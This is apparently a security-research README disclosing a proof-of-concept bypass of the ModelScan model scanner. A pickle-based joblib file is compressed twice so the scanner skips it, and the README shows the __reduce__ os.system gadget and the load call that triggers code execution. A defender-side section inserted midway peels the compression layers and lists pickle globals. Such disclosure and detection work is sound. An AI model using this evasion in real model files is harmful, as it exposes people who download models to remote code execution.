# ModelScan Bypass - Double Compression

**Security Research - ModelScan Bypass Technique**

## Overview

This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan, a popular ML model security scanner. The technique allows malicious pickle-based model files to evade detection.

## Technique

**Nested/double compression**

The payload is compressed twice (gzip, then bz2).

## ModelScan Result

**SKIPPED - Scanner did not analyze this file**

## File

- `exploit_double_compression.joblib.gz.bz2`

## Reproduction Steps

### Testing with ModelScan

```bash
# Install ModelScan
pip install modelscan
# Download the exploit file from this repository
# Then scan it
modelscan scan -p exploit_double_compression.joblib.gz.bz2
```

### Expected Result

SKIPPED - Scanner did not analyze this file

### Triggering the Exploit (⚠️ DO NOT RUN ON PRODUCTION)

```python
import joblib
# WARNING: This will execute arbitrary code!
model = joblib.load('exploit_double_compression.joblib.gz.bz2')
```

## Technical Details

This exploit uses Python's pickle `__reduce__` method for RCE:

```python
def __reduce__(self):
    import os
    return (os.system, ('echo "RCE executed!"',))
```

**Why ModelScan misses this:**

The payload is compressed twice (gzip, then bz2). ModelScan reports the resulting `.joblib.gz.bz2` file as SKIPPED instead of unpacking it and scanning the pickle inside.
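A defender-side check, added here and not part of this repository: it peels compression layers by magic bytes rather than by file extension, confirms the inner payload is a pickle stream, and disassembles it with `pickletools` (which never executes the pickle) to list the globals it would import. The inputs are constructed benign pickles (a dict and an `OrderedDict`), not the repository's exploit file.

```python
import bz2
import gzip
import pickle
import pickletools
from collections import OrderedDict

def peel_layers(data: bytes, max_layers: int = 8):
    """Strip nested gzip/bz2 layers by magic bytes, ignoring the file extension.

    Returns (layer_names, inner_bytes). Stops when the data no longer starts with a
    known magic or max_layers is reached (bounding the loop on adversarial input).
    """
    layers = []
    for _ in range(max_layers):
        if data.startswith(b"\x1f\x8b"):   # gzip magic
            data, layers = gzip.decompress(data), layers + ["gzip"]
        elif data.startswith(b"BZh"):      # bz2 magic
            data, layers = bz2.decompress(data), layers + ["bz2"]
        else:
            break
    return layers, data

def is_pickle(data: bytes) -> bool:
    """Pickle protocol 2+ streams start with PROTO (0x80) followed by the version."""
    return len(data) >= 2 and data[0] == 0x80 and 2 <= data[1] <= 5

def pickle_globals(data: bytes):
    """Disassemble with pickletools (no execution) and list the module.name
    references the pickle would import via GLOBAL / STACK_GLOBAL."""
    refs, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":            # protocol <= 3: arg is "module name"
            refs.append(arg.replace(" ", "."))
        elif op.name == "STACK_GLOBAL":    # protocol 4+: module and name were pushed as strings
            refs.append(f"{strings[-2]}.{strings[-1]}")
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
    return refs

def triage(blob: bytes) -> dict:
    """Peel compression, confirm the payload is a pickle, report the globals it references."""
    layers, inner = peel_layers(blob)
    if not is_pickle(inner):
        return {"layers": layers, "pickle": False, "globals": []}
    return {"layers": layers, "pickle": True, "globals": pickle_globals(inner)}

# Constructed benign samples: a dict and an OrderedDict, each gzip'd then bz2'd to mimic a
# ".joblib.gz.bz2" artefact. Neither carries a payload; OrderedDict just exercises STACK_GLOBAL.
PLAIN = bz2.compress(gzip.compress(pickle.dumps({"weights": [1.0, 2.0]}, protocol=4)))
WITH_GLOBAL = bz2.compress(gzip.compress(pickle.dumps(OrderedDict(a=1), protocol=4)))
```

Any non-empty `globals` list (or a `pickle: True` result for a file a scanner reported as skipped) is the signal to hand the peeled bytes to the scanner or block the load.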
## Security Impact

**Severity**: HIGH

**Attack Vector**:

1. Attacker creates a malicious model using this technique
2. Uploads it to a model hub (HuggingFace, etc.)
3. Victim downloads it and scans with ModelScan
4. Scanner reports "No issues found!" or skips the file
5. Victim loads the model → RCE

## Part of Larger Research

This is one of four bypass techniques discovered:

1. [Compression Mismatch](https://huggingface.co/sandeep1337/modelscan-bypass-compression-mismatch)
2. [Double Compression](https://huggingface.co/sandeep1337/modelscan-bypass-double-compression)
3. [Corrupt Header](https://huggingface.co/sandeep1337/modelscan-bypass-corrupt-header)
4. [Memmap Bypass ⭐](https://huggingface.co/sandeep1337/modelscan-bypass-memmap) - PRIMARY FINDING

## Disclosure

This research is being submitted to Huntr's bug bounty program for responsible disclosure.

**Date**: December 25, 2024

**Researcher**: Security Research Team

## References

- [Huntr Bug Bounty](https://huntr.com/)
- [ModelScan GitHub](https://github.com/protectai/modelscan)

## Disclaimer

⚠️ **For Security Research Only**

This file is provided for security research and vulnerability disclosure purposes only. Do not use this technique for malicious purposes. Loading this file will execute code.

---

**Status**: Under responsible disclosure to Huntr bug bounty program